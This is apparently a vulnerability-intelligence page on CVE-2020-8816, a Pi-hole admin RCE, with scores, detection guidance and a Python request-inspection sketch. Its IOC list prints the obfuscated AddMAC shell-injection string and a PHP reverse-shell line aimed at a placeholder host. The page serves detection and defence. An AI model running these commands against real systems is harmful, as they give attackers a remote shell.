CVE-2020-8816
published 2020-05-29

CVE-2020-8816: Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

Priority: P1, 85, high
CVSS 3.1: 7.2 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-06-10
Exploited in the wild
EPSS: 77.85% (99.5th percentile)

Affected

1 range

Vendor  | Product | Version range | Fixed in
pi-hole | pi-hole | <= 4.3.2      |

Detection & IOCs (extracted from sources)

url: /admin/index.php?login
url: /admin/settings.php?tab=piholedhcp
command: aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("<PAYLOAD>"));'&&
command: php -r '$sock=fsockopen("LHOST", LPORT);exec("/bin/sh -i &3 2>&3");'
path: /opt/pihole
  • Monitor POST requests to /admin/settings.php?tab=piholedhcp containing shell metacharacters (&&, $, %) in the AddMAC parameter field, which is the injection point for this exploit.
  • Detect the hardcoded static PHPSESSID cookie value 'cabesha' in HTTP requests to Pi-hole admin endpoints, which is a strong indicator of this specific exploit script being used.
  • Alert on MAC address field values in DHCP static lease submissions that contain '&&' or shell variable expansion patterns (e.g. ${PATH#...}) rather than valid MAC address format (xx:xx:xx:xx:xx:xx).
  • DHCP server does not need to be running for exploitation to succeed; do not rely on DHCP service state as an indicator of safety.
  • Exploitation requires /opt/pihole to be first in $PATH. Hardening the PATH environment variable for the web server process can mitigate or complicate exploitation.
  • The vulnerability is exploitable by authenticated, privileged dashboard users only; unauthenticated access is not sufficient. Restricting admin dashboard access reduces attack surface.
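
The request checks from the bullets above, sketched as an added example (not code from this page or from the Pi-hole project). The function name, finding labels and sample requests are constructed for illustration; AddIP is an assumed form field.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")
# Shell syntax named in the bullets above: '&&' chaining and $VAR / ${VAR...} expansion.
SHELL_RE = re.compile(r"&&|\$\{?[A-Za-z_]")
SCRIPT_SESSION = "cabesha"  # static PHPSESSID value listed on this page


def inspect_request(method, url, cookie_header, body):
    """Return finding labels for one HTTP request to the Pi-hole admin UI."""
    findings = []
    parts = urlsplit(url)
    if not parts.path.startswith("/admin/"):
        return findings
    cookies = dict(p.strip().split("=", 1) for p in cookie_header.split(";") if "=" in p)
    if cookies.get("PHPSESSID") == SCRIPT_SESSION:
        findings.append("static-phpsessid")
    dhcp_post = (method.upper() == "POST"
                 and parts.path == "/admin/settings.php"
                 and "piholedhcp" in parse_qs(parts.query).get("tab", []))
    if dhcp_post:
        # The form body is URL-encoded, so decode it before inspecting AddMAC.
        for mac in parse_qs(body, keep_blank_values=True).get("AddMAC", []):
            if not MAC_RE.fullmatch(mac):
                findings.append("addmac-not-a-mac")
            if SHELL_RE.search(mac):
                findings.append("addmac-shell-syntax")
    return findings


# Constructed sample requests (not captured traffic); AddIP is an assumed extra field.
DHCP_URL = "/admin/settings.php?tab=piholedhcp"
SUSPICIOUS = ("POST", DHCP_URL, "PHPSESSID=cabesha",
              urlencode({"AddMAC": "aaaaaaaaaaaa&&W=${PATH#/???/}&&", "AddIP": "192.0.2.10"}))
BENIGN = ("POST", DHCP_URL, "PHPSESSID=constructed-session-id",
          urlencode({"AddMAC": "AA:BB:CC:DD:EE:FF", "AddIP": "192.0.2.11"}))

if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, inspect_request(*req))
```

Validating AddMAC against the MAC format is the stronger of the two AddMAC checks, since it flags any non-MAC value rather than only the shell patterns listed here.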

CVSS provenance

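Source    | Version | Score | Severity | Vector
nvd       | v3.1    | 7.2   | HIGH     | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd       | v3.0    | 9.1   | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
nvd       | v2.0    | 6.5   | MEDIUM   | AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck |         | 7.2   | HIGH     |
cisa      |         | 7.2   | HIGH     |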